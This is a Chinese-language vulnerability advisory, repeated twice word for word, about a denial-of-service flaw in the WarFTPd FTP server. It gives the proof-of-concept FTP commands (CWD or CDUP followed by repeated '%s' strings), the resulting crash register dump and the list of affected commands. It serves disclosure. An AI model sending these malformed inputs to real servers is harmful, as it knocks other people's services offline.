War FTP Daemon是32位Windows平台上的FTP服务器。 WarFTPd在处理多个命令的畸形参数时存在漏洞,远程攻击者可能利用此漏洞对服务器造成拒绝服务。 如果向各种命令发送了包含有两次“%s”字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令: $ ftp target (Banner) ftp> quote user anonymous ftp> quote pass bla ftp> cwd %s*256 或者: ftp> cdup %s*256 就会导致服务器崩溃: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)" ESI 0079E7DE EDI 0000000A EIP 00431540 war-ftpd.00431540 00431540 8A08 MOV CL,BYTE PTR DS:[EAX] 目前已知至少以下命令受这个漏洞影响: CWD CDUP DELE NLST LIST SIZE Jgaa WarFTPd 1.82.00-RC11 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: <a href="http://support.jgaa.com/index.php?MenuPage=frontpage" target="_blank">http://support.jgaa.com/index.php?MenuPage=frontpage</a>
War FTP Daemon是32位Windows平台上的FTP服务器。 WarFTPd在处理多个命令的畸形参数时存在漏洞,远程攻击者可能利用此漏洞对服务器造成拒绝服务。 如果向各种命令发送了包含有两次“%s”字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令: $ ftp target (Banner) ftp> quote user anonymous ftp> quote pass bla ftp> cwd %s*256 或者: ftp> cdup %s*256 就会导致服务器崩溃: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)" ESI 0079E7DE EDI 0000000A EIP 00431540 war-ftpd.00431540 00431540 8A08 MOV CL,BYTE PTR DS:[EAX] 目前已知至少以下命令受这个漏洞影响: CWD CDUP DELE NLST LIST SIZE Jgaa WarFTPd 1.82.00-RC11 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: <a href="http://support.jgaa.com/index.php?MenuPage=frontpage" target="_blank">http://support.jgaa.com/index.php?MenuPage=frontpage</a>